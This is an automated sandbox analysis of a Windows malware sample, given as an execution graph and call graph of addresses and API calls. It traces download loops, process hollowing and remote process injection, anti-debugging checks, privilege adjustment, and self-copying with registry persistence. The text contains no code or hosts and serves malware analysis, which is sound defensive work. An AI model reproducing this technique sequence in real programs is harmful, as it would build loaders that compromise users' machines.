                                                                                                                                                                                                                        execution_graph 1413 7ff7e83c2160 1414 7ff7e83c218a InternetOpenW 1413->1414 1415 7ff7e83c21c4 InternetOpenUrlW 1414->1415 1416 7ff7e83c21b7 Sleep 1414->1416 1417 7ff7e83c224d HttpQueryInfoA 1415->1417 1418 7ff7e83c21fb InternetOpenUrlW 1415->1418 1416->1414 1420 7ff7e83c22a2 1417->1420 1421 7ff7e83c227c InternetCloseHandle InternetCloseHandle Sleep 1417->1421 1418->1417 1419 7ff7e83c2232 InternetCloseHandle Sleep 1418->1419 1419->1414 1422 7ff7e83c2309 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1420->1422 1423 7ff7e83c22ac InternetCloseHandle InternetOpenUrlW 1420->1423 1421->1414 1425 7ff7e83c236e InternetCloseHandle InternetCloseHandle 1422->1425 1428 7ff7e83c2388 1422->1428 1423->1422 1424 7ff7e83c22ee InternetCloseHandle Sleep 1423->1424 1424->1414 1426 7ff7e83c2407 1425->1426 1427 7ff7e83c2390 InternetReadFile 1427->1428 1429 7ff7e83c23de InternetCloseHandle InternetCloseHandle 1427->1429 1428->1427 1428->1429 1429->1426 1464 7ff7e83c1088 GetModuleHandleA GetProcAddress 1465 7ff7e83c10bb 1464->1465 836 7ff7e83c335c 839 7ff7e83c24cc GetModuleFileNameW 836->839 840 7ff7e83c254d 839->840 846 7ff7e83c2548 839->846 841 7ff7e83c25a1 840->841 842 7ff7e83c258b 840->842 882 7ff7e83c240c ExpandEnvironmentStringsW 841->882 843 7ff7e83c25bf 842->843 844 7ff7e83c2595 842->844 883 7ff7e83c244c ExpandEnvironmentStringsW 843->883 844->846 884 7ff7e83c248c ExpandEnvironmentStringsW 844->884 847 7ff7e83c25b6 847->846 850 7ff7e83c2611 CreateProcessW 847->850 850->846 851 7ff7e83c266c CreateFileW 850->851 851->846 852 7ff7e83c26b3 GetFileSize 851->852 853 7ff7e83c26d1 852->853 854 7ff7e83c26db CloseHandle 852->854 853->854 855 7ff7e83c26eb VirtualAlloc 853->855 854->846 856 7ff7e83c2725 ReadFile 855->856 857 7ff7e83c2715 CloseHandle 855->857 858 7ff7e83c2752 VirtualFree CloseHandle 856->858 859 7ff7e83c2775 CloseHandle GetThreadContext 856->859 857->846 858->846 860 7ff7e83c27c5 VirtualFree 859->860 861 7ff7e83c27dd ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 859->861 860->846 862 7ff7e83c2864 VirtualFree 861->862 863 7ff7e83c287c VirtualAllocEx 861->863 862->846 864 7ff7e83c28ff WriteProcessMemory 863->864 865 7ff7e83c28e7 VirtualFree 863->865 866 7ff7e83c2935 VirtualFree 864->866 868 7ff7e83c294d 864->868 865->846 866->846 867 7ff7e83c2983 WriteProcessMemory 867->868 869 7ff7e83c2a0e VirtualFree 867->869 868->867 872 7ff7e83c2a2b 868->872 869->846 870 7ff7e83c2a9d RtlCompareMemory 870->872 879 7ff7e83c2af0 870->879 871 7ff7e83c2d1c WriteProcessMemory SetThreadContext 873 7ff7e83c2da2 VirtualFree 871->873 874 7ff7e83c2db7 ResumeThread 871->874 872->870 872->871 873->846 875 7ff7e83c2dc9 VirtualFree 874->875 876 7ff7e83c2dde VirtualFree 874->876 875->846 876->846 877 7ff7e83c2d17 877->871 878 7ff7e83c2c20 ReadProcessMemory WriteProcessMemory 880 7ff7e83c2cf5 VirtualFree 878->880 881 7ff7e83c2d0d 878->881 879->877 879->878 880->846 881->879 882->847 883->847 884->847 888 7ff7e83c340c 949 7ff7e83c153c 888->949 893 7ff7e83c3424 ExitProcess 894 7ff7e83c342c 1183 7ff7e83c40a4 GetCurrentProcess OpenProcessToken 894->1183 898 7ff7e83c3447 899 7ff7e83c345c 898->899 900 7ff7e83c34ab 898->900 901 7ff7e83c41e4 3 API calls 899->901 905 7ff7e83c34c0 900->905 906 7ff7e83c34fc 900->906 902 7ff7e83c3468 901->902 903 7ff7e83c3482 ExitProcess 902->903 904 7ff7e83c346f 902->904 907 7ff7e83c41e4 3 API calls 904->907 908 7ff7e83c41e4 3 API calls 905->908 912 7ff7e83c3552 906->912 913 7ff7e83c3511 906->913 909 7ff7e83c347b 907->909 910 7ff7e83c34cc 908->910 909->903 911 7ff7e83c348a 909->911 914 7ff7e83c34d3 ExitProcess 910->914 915 7ff7e83c34db 910->915 1217 7ff7e83c329c 911->1217 1207 7ff7e83c3a34 912->1207 1198 7ff7e83c41e4 CreateMutexA 913->1198 916 7ff7e83c320c 21 API calls 915->916 920 7ff7e83c34e0 916->920 924 7ff7e83c34f4 ExitProcess 920->924 925 7ff7e83c34e7 Sleep 920->925 922 7ff7e83c348f 927 7ff7e83c3496 Sleep 922->927 928 7ff7e83c34a3 ExitProcess 922->928 925->920 927->922 929 7ff7e83c3524 ExitProcess 930 7ff7e83c352c 1202 7ff7e83c320c 930->1202 933 7ff7e83c356a 936 7ff7e83c41e4 3 API calls 933->936 934 7ff7e83c35be CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 935 7ff7e83c3531 937 7ff7e83c3545 ExitProcess 935->937 938 7ff7e83c3538 Sleep 935->938 939 7ff7e83c3576 936->939 938->935 940 7ff7e83c3590 ExitProcess 939->940 941 7ff7e83c357d 939->941 942 7ff7e83c41e4 3 API calls 941->942 943 7ff7e83c3589 942->943 943->940 944 7ff7e83c3598 943->944 945 7ff7e83c329c 44 API calls 944->945 946 7ff7e83c359d 945->946 947 7ff7e83c35b1 ExitProcess 946->947 948 7ff7e83c35a4 Sleep 946->948 948->946 1226 7ff7e83c149c LoadLibraryA GetProcAddress 949->1226 951 7ff7e83c15bd 1227 7ff7e83c149c LoadLibraryA GetProcAddress 951->1227 953 7ff7e83c15d7 1228 7ff7e83c14ec LoadLibraryA GetProcAddress 953->1228 955 7ff7e83c15f1 1229 7ff7e83c14ec LoadLibraryA GetProcAddress 955->1229 957 7ff7e83c160b 1230 7ff7e83c14ec LoadLibraryA GetProcAddress 957->1230 959 7ff7e83c1625 1231 7ff7e83c14ec LoadLibraryA GetProcAddress 959->1231 961 7ff7e83c163f 1232 7ff7e83c14ec LoadLibraryA GetProcAddress 961->1232 963 7ff7e83c1659 1233 7ff7e83c14ec LoadLibraryA GetProcAddress 963->1233 965 7ff7e83c1673 1234 7ff7e83c14ec LoadLibraryA GetProcAddress 965->1234 967 7ff7e83c168d 1235 7ff7e83c14ec LoadLibraryA GetProcAddress 967->1235 969 7ff7e83c16a7 1236 7ff7e83c14ec LoadLibraryA GetProcAddress 969->1236 971 7ff7e83c16c1 1237 7ff7e83c149c LoadLibraryA GetProcAddress 971->1237 973 7ff7e83c16db 1238 7ff7e83c149c LoadLibraryA GetProcAddress 973->1238 975 7ff7e83c16f5 1239 7ff7e83c149c LoadLibraryA GetProcAddress 975->1239 977 7ff7e83c170f 1240 7ff7e83c149c LoadLibraryA GetProcAddress 977->1240 979 7ff7e83c1729 1241 7ff7e83c14ec LoadLibraryA GetProcAddress 979->1241 981 7ff7e83c1743 1242 7ff7e83c14ec LoadLibraryA GetProcAddress 981->1242 983 7ff7e83c175d 1243 7ff7e83c14ec LoadLibraryA GetProcAddress 983->1243 985 7ff7e83c1777 1244 7ff7e83c14ec LoadLibraryA GetProcAddress 985->1244 987 7ff7e83c1791 1245 7ff7e83c14ec LoadLibraryA GetProcAddress 987->1245 989 7ff7e83c17ab 1246 7ff7e83c14ec LoadLibraryA GetProcAddress 989->1246 991 7ff7e83c17c5 1247 7ff7e83c14ec LoadLibraryA GetProcAddress 991->1247 993 7ff7e83c17df 1248 7ff7e83c14ec LoadLibraryA GetProcAddress 993->1248 995 7ff7e83c17f9 1249 7ff7e83c14ec LoadLibraryA GetProcAddress 995->1249 997 7ff7e83c1813 1250 7ff7e83c14ec LoadLibraryA GetProcAddress 997->1250 999 7ff7e83c182d 1251 7ff7e83c14ec LoadLibraryA GetProcAddress 999->1251 1001 7ff7e83c1847 1252 7ff7e83c14ec LoadLibraryA GetProcAddress 1001->1252 1003 7ff7e83c1861 1253 7ff7e83c14ec LoadLibraryA GetProcAddress 1003->1253 1005 7ff7e83c187b 1254 7ff7e83c14ec LoadLibraryA GetProcAddress 1005->1254 1007 7ff7e83c1895 1255 7ff7e83c14ec LoadLibraryA GetProcAddress 1007->1255 1009 7ff7e83c18af 1256 7ff7e83c14ec LoadLibraryA GetProcAddress 1009->1256 1011 7ff7e83c18c9 1257 7ff7e83c14ec LoadLibraryA GetProcAddress 1011->1257 1013 7ff7e83c18e3 1258 7ff7e83c14ec LoadLibraryA GetProcAddress 1013->1258 1015 7ff7e83c18fd 1259 7ff7e83c14ec LoadLibraryA GetProcAddress 1015->1259 1017 7ff7e83c1917 1260 7ff7e83c14ec LoadLibraryA GetProcAddress 1017->1260 1019 7ff7e83c1931 1261 7ff7e83c14ec LoadLibraryA GetProcAddress 1019->1261 1021 7ff7e83c194b 1262 7ff7e83c14ec LoadLibraryA GetProcAddress 1021->1262 1023 7ff7e83c1965 1263 7ff7e83c14ec LoadLibraryA GetProcAddress 1023->1263 1025 7ff7e83c197f 1264 7ff7e83c14ec LoadLibraryA GetProcAddress 1025->1264 1027 7ff7e83c1999 1265 7ff7e83c14ec LoadLibraryA GetProcAddress 1027->1265 1029 7ff7e83c19b3 1266 7ff7e83c14ec LoadLibraryA GetProcAddress 1029->1266 1031 7ff7e83c19cd 1267 7ff7e83c14ec LoadLibraryA GetProcAddress 1031->1267 1033 7ff7e83c19e7 1268 7ff7e83c14ec LoadLibraryA GetProcAddress 1033->1268 1035 7ff7e83c1a01 1269 7ff7e83c14ec LoadLibraryA GetProcAddress 1035->1269 1037 7ff7e83c1a1b 1270 7ff7e83c14ec LoadLibraryA GetProcAddress 1037->1270 1039 7ff7e83c1a35 1271 7ff7e83c14ec LoadLibraryA GetProcAddress 1039->1271 1041 7ff7e83c1a4f 1272 7ff7e83c14ec LoadLibraryA GetProcAddress 1041->1272 1043 7ff7e83c1a69 1273 7ff7e83c14ec LoadLibraryA GetProcAddress 1043->1273 1045 7ff7e83c1a83 1274 7ff7e83c14ec LoadLibraryA GetProcAddress 1045->1274 1047 7ff7e83c1a9d 1275 7ff7e83c14ec LoadLibraryA GetProcAddress 1047->1275 1049 7ff7e83c1ab7 1276 7ff7e83c14ec LoadLibraryA GetProcAddress 1049->1276 1051 7ff7e83c1ad1 1277 7ff7e83c14ec LoadLibraryA GetProcAddress 1051->1277 1053 7ff7e83c1aeb 1278 7ff7e83c14ec LoadLibraryA GetProcAddress 1053->1278 1055 7ff7e83c1b05 1279 7ff7e83c14ec LoadLibraryA GetProcAddress 1055->1279 1057 7ff7e83c1b1f 1280 7ff7e83c14ec LoadLibraryA GetProcAddress 1057->1280 1059 7ff7e83c1b39 1281 7ff7e83c14ec LoadLibraryA GetProcAddress 1059->1281 1061 7ff7e83c1b53 1282 7ff7e83c14ec LoadLibraryA GetProcAddress 1061->1282 1063 7ff7e83c1b6d 1283 7ff7e83c14ec LoadLibraryA GetProcAddress 1063->1283 1065 7ff7e83c1b87 1284 7ff7e83c14ec LoadLibraryA GetProcAddress 1065->1284 1067 7ff7e83c1ba1 1285 7ff7e83c14ec LoadLibraryA GetProcAddress 1067->1285 1069 7ff7e83c1bbb 1286 7ff7e83c14ec LoadLibraryA GetProcAddress 1069->1286 1071 7ff7e83c1bd5 1287 7ff7e83c14ec LoadLibraryA GetProcAddress 1071->1287 1073 7ff7e83c1bef 1288 7ff7e83c14ec LoadLibraryA GetProcAddress 1073->1288 1075 7ff7e83c1c09 1289 7ff7e83c14ec LoadLibraryA GetProcAddress 1075->1289 1077 7ff7e83c1c23 1290 7ff7e83c14ec LoadLibraryA GetProcAddress 1077->1290 1079 7ff7e83c1c3d 1291 7ff7e83c14ec LoadLibraryA GetProcAddress 1079->1291 1081 7ff7e83c1c57 1292 7ff7e83c14ec LoadLibraryA GetProcAddress 1081->1292 1083 7ff7e83c1c71 1293 7ff7e83c14ec LoadLibraryA GetProcAddress 1083->1293 1085 7ff7e83c1c8b 1294 7ff7e83c14ec LoadLibraryA GetProcAddress 1085->1294 1087 7ff7e83c1ca5 1295 7ff7e83c14ec LoadLibraryA GetProcAddress 1087->1295 1089 7ff7e83c1cbf 1296 7ff7e83c14ec LoadLibraryA GetProcAddress 1089->1296 1091 7ff7e83c1cd9 1297 7ff7e83c14ec LoadLibraryA GetProcAddress 1091->1297 1093 7ff7e83c1cf3 1298 7ff7e83c14ec LoadLibraryA GetProcAddress 1093->1298 1095 7ff7e83c1d0d 1299 7ff7e83c14ec LoadLibraryA GetProcAddress 1095->1299 1097 7ff7e83c1d27 1300 7ff7e83c14ec LoadLibraryA GetProcAddress 1097->1300 1099 7ff7e83c1d41 1301 7ff7e83c14ec LoadLibraryA GetProcAddress 1099->1301 1101 7ff7e83c1d5b 1302 7ff7e83c14ec LoadLibraryA GetProcAddress 1101->1302 1103 7ff7e83c1d75 1303 7ff7e83c14ec LoadLibraryA GetProcAddress 1103->1303 1105 7ff7e83c1d8f 1304 7ff7e83c14ec LoadLibraryA GetProcAddress 1105->1304 1107 7ff7e83c1da9 1305 7ff7e83c14ec LoadLibraryA GetProcAddress 1107->1305 1109 7ff7e83c1dc3 1306 7ff7e83c14ec LoadLibraryA GetProcAddress 1109->1306 1111 7ff7e83c1ddd 1307 7ff7e83c14ec LoadLibraryA GetProcAddress 1111->1307 1113 7ff7e83c1df7 1308 7ff7e83c14ec LoadLibraryA GetProcAddress 1113->1308 1115 7ff7e83c1e11 1309 7ff7e83c14ec LoadLibraryA GetProcAddress 1115->1309 1117 7ff7e83c1e2b 1310 7ff7e83c14ec LoadLibraryA GetProcAddress 1117->1310 1119 7ff7e83c1e45 1311 7ff7e83c14ec LoadLibraryA GetProcAddress 1119->1311 1121 7ff7e83c1e5f 1312 7ff7e83c14ec LoadLibraryA GetProcAddress 1121->1312 1123 7ff7e83c1e79 1313 7ff7e83c14ec LoadLibraryA GetProcAddress 1123->1313 1125 7ff7e83c1e93 1314 7ff7e83c14ec LoadLibraryA GetProcAddress 1125->1314 1127 7ff7e83c1ead 1315 7ff7e83c14ec LoadLibraryA GetProcAddress 1127->1315 1129 7ff7e83c1ec7 1316 7ff7e83c14ec LoadLibraryA GetProcAddress 1129->1316 1131 7ff7e83c1ee1 1317 7ff7e83c14ec LoadLibraryA GetProcAddress 1131->1317 1133 7ff7e83c1efb 1318 7ff7e83c14ec LoadLibraryA GetProcAddress 1133->1318 1135 7ff7e83c1f15 1319 7ff7e83c14ec LoadLibraryA GetProcAddress 1135->1319 1137 7ff7e83c1f2f 1320 7ff7e83c14ec LoadLibraryA GetProcAddress 1137->1320 1139 7ff7e83c1f49 1321 7ff7e83c14ec LoadLibraryA GetProcAddress 1139->1321 1141 7ff7e83c1f63 1322 7ff7e83c14ec LoadLibraryA GetProcAddress 1141->1322 1143 7ff7e83c1f7d 1323 7ff7e83c14ec LoadLibraryA GetProcAddress 1143->1323 1145 7ff7e83c1f97 1324 7ff7e83c14ec LoadLibraryA GetProcAddress 1145->1324 1147 7ff7e83c1fb1 1325 7ff7e83c149c LoadLibraryA GetProcAddress 1147->1325 1149 7ff7e83c1fcb 1326 7ff7e83c14ec LoadLibraryA GetProcAddress 1149->1326 1151 7ff7e83c1fe5 1327 7ff7e83c14ec LoadLibraryA GetProcAddress 1151->1327 1153 7ff7e83c1fff 1328 7ff7e83c14ec LoadLibraryA GetProcAddress 1153->1328 1155 7ff7e83c2019 1329 7ff7e83c14ec LoadLibraryA GetProcAddress 1155->1329 1157 7ff7e83c2033 1330 7ff7e83c14ec LoadLibraryA GetProcAddress 1157->1330 1159 7ff7e83c204d 1331 7ff7e83c14ec LoadLibraryA GetProcAddress 1159->1331 1161 7ff7e83c2067 1332 7ff7e83c14ec LoadLibraryA GetProcAddress 1161->1332 1163 7ff7e83c2081 1333 7ff7e83c149c LoadLibraryA GetProcAddress 1163->1333 1165 7ff7e83c209b 1334 7ff7e83c149c LoadLibraryA GetProcAddress 1165->1334 1167 7ff7e83c20b5 1335 7ff7e83c14ec LoadLibraryA GetProcAddress 1167->1335 1169 7ff7e83c20cf 1336 7ff7e83c14ec LoadLibraryA GetProcAddress 1169->1336 1171 7ff7e83c20e9 1337 7ff7e83c14ec LoadLibraryA GetProcAddress 1171->1337 1173 7ff7e83c2103 1338 7ff7e83c14ec LoadLibraryA GetProcAddress 1173->1338 1175 7ff7e83c211d 1339 7ff7e83c14ec LoadLibraryA GetProcAddress 1175->1339 1177 7ff7e83c2137 1340 7ff7e83c14ec LoadLibraryA GetProcAddress 1177->1340 1179 7ff7e83c2151 1180 7ff7e83c31ac IsDebuggerPresent 1179->1180 1181 7ff7e83c31ba 1180->1181 1182 7ff7e83c31be GetCurrentProcess CheckRemoteDebuggerPresent 1180->1182 1181->893 1181->894 1182->1181 1184 7ff7e83c3431 1183->1184 1185 7ff7e83c40ca GetTokenInformation 1183->1185 1194 7ff7e83c3ca4 GetModuleFileNameW 1184->1194 1341 7ff7e83c3b14 VirtualAlloc 1185->1341 1187 7ff7e83c40fb GetTokenInformation 1188 7ff7e83c4128 CloseHandle 1187->1188 1192 7ff7e83c4142 AdjustTokenPrivileges CloseHandle 1187->1192 1189 7ff7e83c3ae4 VirtualFree 1188->1189 1190 7ff7e83c413d 1189->1190 1190->1184 1342 7ff7e83c3ae4 1192->1342 1195 7ff7e83c3d92 wcsncpy 1194->1195 1196 7ff7e83c3ccf PathFindFileNameW wcslen 1194->1196 1197 7ff7e83c3d09 1195->1197 1196->1197 1197->898 1199 7ff7e83c4210 GetLastError 1198->1199 1200 7ff7e83c351d 1198->1200 1199->1200 1201 7ff7e83c421d CloseHandle 1199->1201 1200->929 1200->930 1201->1200 1345 7ff7e83c3884 1202->1345 1204 7ff7e83c321c 1348 7ff7e83c42f4 CreateFileW 1204->1348 1208 7ff7e83c3704 3 API calls 1207->1208 1209 7ff7e83c3a5f 1208->1209 1210 7ff7e83c3884 11 API calls 1209->1210 1211 7ff7e83c3a69 GetModuleFileNameW DeleteFileW CopyFileW 1210->1211 1212 7ff7e83c3557 1211->1212 1213 7ff7e83c3aab SetFileAttributesW 1211->1213 1215 7ff7e83c339c GetVersionExW 1212->1215 1365 7ff7e83c3974 RegOpenKeyExW 1213->1365 1216 7ff7e83c33cd 1215->1216 1216->933 1216->934 1218 7ff7e83c3884 11 API calls 1217->1218 1219 7ff7e83c32ad 1218->1219 1368 7ff7e83c4524 CreateFileW 1219->1368 1221 7ff7e83c32c5 1222 7ff7e83c3307 CreateThread 1221->1222 1380 7ff7e83c4084 1221->1380 1222->922 1226->951 1227->953 1228->955 1229->957 1230->959 1231->961 1232->963 1233->965 1234->967 1235->969 1236->971 1237->973 1238->975 1239->977 1240->979 1241->981 1242->983 1243->985 1244->987 1245->989 1246->991 1247->993 1248->995 1249->997 1250->999 1251->1001 1252->1003 1253->1005 1254->1007 1255->1009 1256->1011 1257->1013 1258->1015 1259->1017 1260->1019 1261->1021 1262->1023 1263->1025 1264->1027 1265->1029 1266->1031 1267->1033 1268->1035 1269->1037 1270->1039 1271->1041 1272->1043 1273->1045 1274->1047 1275->1049 1276->1051 1277->1053 1278->1055 1279->1057 1280->1059 1281->1061 1282->1063 1283->1065 1284->1067 1285->1069 1286->1071 1287->1073 1288->1075 1289->1077 1290->1079 1291->1081 1292->1083 1293->1085 1294->1087 1295->1089 1296->1091 1297->1093 1298->1095 1299->1097 1300->1099 1301->1101 1302->1103 1303->1105 1304->1107 1305->1109 1306->1111 1307->1113 1308->1115 1309->1117 1310->1119 1311->1121 1312->1123 1313->1125 1314->1127 1315->1129 1316->1131 1317->1133 1318->1135 1319->1137 1320->1139 1321->1141 1322->1143 1323->1145 1324->1147 1325->1149 1326->1151 1327->1153 1328->1155 1329->1157 1330->1159 1331->1161 1332->1163 1333->1165 1334->1167 1335->1169 1336->1171 1337->1173 1338->1175 1339->1177 1340->1179 1341->1187 1343 7ff7e83c3af5 VirtualFree 1342->1343 1344 7ff7e83c3b08 1342->1344 1343->1344 1344->1184 1354 7ff7e83c3704 GetWindowsDirectoryW 1345->1354 1347 7ff7e83c38b3 8 API calls 1347->1204 1349 7ff7e83c434a 1348->1349 1350 7ff7e83c436b GetLastError 1348->1350 1359 7ff7e83c4244 GetFileSize 1349->1359 1352 7ff7e83c322f CreateThread Sleep CreateThread 1350->1352 1352->935 1355 7ff7e83c3758 GetVolumeInformationW 1354->1355 1356 7ff7e83c374e 1354->1356 1358 7ff7e83c37d4 1355->1358 1356->1355 1357 7ff7e83c383e wsprintfW 1357->1347 1358->1357 1364 7ff7e83c3b14 VirtualAlloc 1359->1364 1361 7ff7e83c4270 1362 7ff7e83c4284 SetFilePointer ReadFile 1361->1362 1363 7ff7e83c42ba CloseHandle 1361->1363 1362->1363 1363->1352 1364->1361 1366 7ff7e83c39b9 RegSetValueExW RegCloseKey 1365->1366 1367 7ff7e83c39b5 1365->1367 1366->1367 1367->1212 1369 7ff7e83c4585 GetFileSize GetProcessHeap RtlAllocateHeap 1368->1369 1370 7ff7e83c457e 1368->1370 1371 7ff7e83c45e0 ReadFile 1369->1371 1372 7ff7e83c45ce CloseHandle 1369->1372 1370->1221 1373 7ff7e83c462f 1371->1373 1374 7ff7e83c4607 GetProcessHeap HeapFree CloseHandle 1371->1374 1372->1370 1375 7ff7e83c4648 GetProcessHeap HeapFree CloseHandle 1373->1375 1377 7ff7e83c4670 1373->1377 1374->1370 1375->1370 1376 7ff7e83c47db GetProcessHeap HeapFree CloseHandle 1376->1370 1377->1376 1378 7ff7e83c472b GetProcessHeap RtlAllocateHeap 1377->1378 1379 7ff7e83c4774 1378->1379 1379->1376 1399 7ff7e83c3fc4 CreateToolhelp32Snapshot 1380->1399 1383 7ff7e83c10d8 OpenProcess 1384 7ff7e83c111f 1383->1384 1385 7ff7e83c1115 1383->1385 1406 7ff7e83c13c4 GetModuleHandleA GetProcAddress 1384->1406 1385->1222 1387 7ff7e83c112c 1387->1385 1388 7ff7e83c11fe VirtualAllocEx 1387->1388 1388->1385 1389 7ff7e83c124f WriteProcessMemory 1388->1389 1389->1385 1390 7ff7e83c1286 WriteProcessMemory 1389->1390 1390->1385 1391 7ff7e83c12d1 1390->1391 1408 7ff7e83c1444 GetSystemInfo 1391->1408 1394 7ff7e83c12fe GetModuleHandleA GetProcAddress 1394->1385 1396 7ff7e83c1338 1394->1396 1395 7ff7e83c1444 GetSystemInfo 1397 7ff7e83c12f4 1395->1397 1396->1385 1398 7ff7e83c1399 CloseHandle 1396->1398 1397->1394 1397->1398 1398->1385 1400 7ff7e83c3fff Process32FirstW 1399->1400 1401 7ff7e83c32f2 1399->1401 1402 7ff7e83c4059 CloseHandle 1400->1402 1403 7ff7e83c401e wcscmp 1400->1403 1401->1383 1402->1401 1404 7ff7e83c4042 Process32NextW 1403->1404 1405 7ff7e83c4035 1403->1405 1404->1402 1404->1403 1405->1402 1407 7ff7e83c13ff 1406->1407 1407->1387 1409 7ff7e83c12ea 1408->1409 1409->1394 1409->1395 1410 7ff7e83c333c 1411 7ff7e83c24cc 37 API calls 1410->1411 1412 7ff7e83c334c 1411->1412 1430 7ff7e83c306c 1435 7ff7e83c3075 1430->1435 1431 7ff7e83c3161 1434 7ff7e83c3be4 RegDeleteKeyW 1434->1435 1435->1431 1435->1434 1436 7ff7e83c3de4 9 API calls 1435->1436 1437 7ff7e83c3974 3 API calls 1435->1437 1439 7ff7e83c4404 CreateFileW 1435->1439 1444 7ff7e83c3b44 RegOpenKeyExW 1435->1444 1436->1435 1438 7ff7e83c3151 Sleep 1437->1438 1438->1435 1440 7ff7e83c445f 1439->1440 1441 7ff7e83c449a 1439->1441 1447 7ff7e83c4384 SetFilePointer WriteFile SetEndOfFile 1440->1447 1441->1435 1443 7ff7e83c447b SetFileAttributesW CloseHandle 1443->1441 1445 7ff7e83c3bd2 1444->1445 1446 7ff7e83c3b98 RegSetValueExW RegCloseKey 1444->1446 1445->1435 1446->1445 1447->1443 1448 7ff7e83c317c 1449 7ff7e83c3185 1448->1449 1450 7ff7e83c319e 1449->1450 1453 7ff7e83c2ffc 1449->1453 1458 7ff7e83c2dfc CreateMutexA 1453->1458 1456 7ff7e83c3017 Sleep CreateThread WaitForSingleObject 1457 7ff7e83c305c Sleep 1456->1457 1457->1449 1459 7ff7e83c2e45 GetLastError 1458->1459 1460 7ff7e83c2e28 ReleaseMutex CloseHandle 1458->1460 1462 7ff7e83c2e52 ReleaseMutex CloseHandle 1459->1462 1463 7ff7e83c2e6f ReleaseMutex CloseHandle 1459->1463 1461 7ff7e83c2e87 1460->1461 1461->1456 1461->1457 1462->1461 1463->1461 1466 7ff7e83c2e9c CreateMutexA 1467 7ff7e83c2ec1 ReleaseMutex CloseHandle 1466->1467 1468 7ff7e83c2ede GetLastError 1466->1468 1469 7ff7e83c2f20 1467->1469 1470 7ff7e83c2f08 ReleaseMutex CloseHandle 1468->1470 1471 7ff7e83c2eeb ReleaseMutex CloseHandle 1468->1471 1470->1469 1471->1469 1472 7ff7e83c2f2c 1473 7ff7e83c3884 11 API calls 1472->1473 1474 7ff7e83c2f6b 1473->1474 1475 7ff7e83c4524 17 API calls 1474->1475 1476 7ff7e83c2f8f 1475->1476 1477 7ff7e83c4084 5 API calls 1476->1477 1478 7ff7e83c2fb2 1477->1478 1479 7ff7e83c10d8 10 API calls 1478->1479 1480 7ff7e83c2fc7 GetProcessHeap HeapFree 1479->1480

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                                        callgraph 0 Function_00007FF7E83CE465 1 Function_00007FF7E83C2160 2 Function_00007FF7E83CB061 3 Function_00007FF7E83CEB58 4 Function_00007FF7E83CFD58 5 Function_00007FF7E83C335C 114 Function_00007FF7E83C24CC 5->114 6 Function_00007FF7E83CB05A 7 Function_00007FF7E83CC874 8 Function_00007FF7E83CB776 9 Function_00007FF7E83C3974 10 Function_00007FF7E83CB772 11 Function_00007FF7E83CE46C 12 Function_00007FF7E83CFA6D 13 Function_00007FF7E83C306C 13->9 38 Function_00007FF7E83C3B44 13->38 55 Function_00007FF7E83C3BE4 13->55 56 Function_00007FF7E83C3DE4 13->56 70 Function_00007FF7E83C4404 13->70 14 Function_00007FF7E83C147F 15 Function_00007FF7E83CB180 16 Function_00007FF7E83C3884 69 Function_00007FF7E83C3704 16->69 17 Function_00007FF7E83C4084 104 Function_00007FF7E83C3FC4 17->104 18 Function_00007FF7E83C4384 19 Function_00007FF7E83CF67D 20 Function_00007FF7E83CB277 21 Function_00007FF7E83CB778 22 Function_00007FF7E83C317C 75 Function_00007FF7E83C2FFC 22->75 23 Function_00007FF7E83C337C 23->114 24 Function_00007FF7E83CE796 25 Function_00007FF7E83C1088 26 Function_00007FF7E83C248C 27 Function_00007FF7E83C4524 99 Function_00007FF7E83C44B4 27->99 28 Function_00007FF7E83C3C24 29 Function_00007FF7E83CE12F 30 Function_00007FF7E83C3A34 30->9 30->16 30->69 31 Function_00007FF7E83CE129 32 Function_00007FF7E83C2F2C 32->16 32->17 32->27 32->28 59 Function_00007FF7E83C10D8 32->59 33 Function_00007FF7E83CF443 34 Function_00007FF7E83CDB44 35 Function_00007FF7E83D0340 36 Function_00007FF7E83C1444 37 Function_00007FF7E83C4244 77 Function_00007FF7E83C3B14 37->77 39 Function_00007FF7E83CC038 40 Function_00007FF7E83C333C 40->114 41 Function_00007FF7E83C153C 65 Function_00007FF7E83C14EC 41->65 92 Function_00007FF7E83C149C 41->92 42 Function_00007FF7E83CE454 43 Function_00007FF7E83CE155 44 Function_00007FF7E83CC14F 45 Function_00007FF7E83CB250 46 Function_00007FF7E83CE151 47 Function_00007FF7E83CB052 48 Function_00007FF7E83CB04E 49 Function_00007FF7E83C354D 50 Function_00007FF7E83C244C 51 Function_00007FF7E83CC2E4 52 Function_00007FF7E83CD2E5 53 Function_00007FF7E83C3AE4 54 Function_00007FF7E83C41E4 57 Function_00007FF7E83CCCE1 58 Function_00007FF7E83CD2E2 59->36 68 Function_00007FF7E83C1000 59->68 105 Function_00007FF7E83C13C4 59->105 60 Function_00007FF7E83D02F0 61 Function_00007FF7E83C42F4 61->37 62 Function_00007FF7E83CF4EB 63 Function_00007FF7E83CD2E7 64 Function_00007FF7E83CF4E7 66 Function_00007FF7E83CD2E9 67 Function_00007FF7E83CF4E9 112 Function_00007FF7E83C36D4 69->112 70->18 71 Function_00007FF7E83CBBFB 72 Function_00007FF7E83CBBF7 73 Function_00007FF7E83CC4F8 74 Function_00007FF7E83C2DFC 75->74 76 Function_00007FF7E83CBBF9 78 Function_00007FF7E83CEA11 79 Function_00007FF7E83CE812 80 Function_00007FF7E83CFD12 81 Function_00007FF7E83CE408 82 Function_00007FF7E83C340C 82->30 82->41 82->54 83 Function_00007FF7E83C320C 82->83 87 Function_00007FF7E83C40A4 82->87 88 Function_00007FF7E83C3CA4 82->88 93 Function_00007FF7E83C339C 82->93 94 Function_00007FF7E83C329C 82->94 100 Function_00007FF7E83C31AC 82->100 111 Function_00007FF7E83C3ED4 82->111 83->16 83->61 84 Function_00007FF7E83C240C 85 Function_00007FF7E83CD70A 86 Function_00007FF7E83CE7A5 87->53 87->77 89 Function_00007FF7E83CF1A1 90 Function_00007FF7E83CCE9D 91 Function_00007FF7E83C369E 94->16 94->17 94->27 94->28 94->59 95 Function_00007FF7E83C2E9C 96 Function_00007FF7E83CE9B3 97 Function_00007FF7E83CFAB3 98 Function_00007FF7E83CDEB4 101 Function_00007FF7E83C36AC 102 Function_00007FF7E83CE9A9 103 Function_00007FF7E83D00AA 106 Function_00007FF7E83CD7BB 107 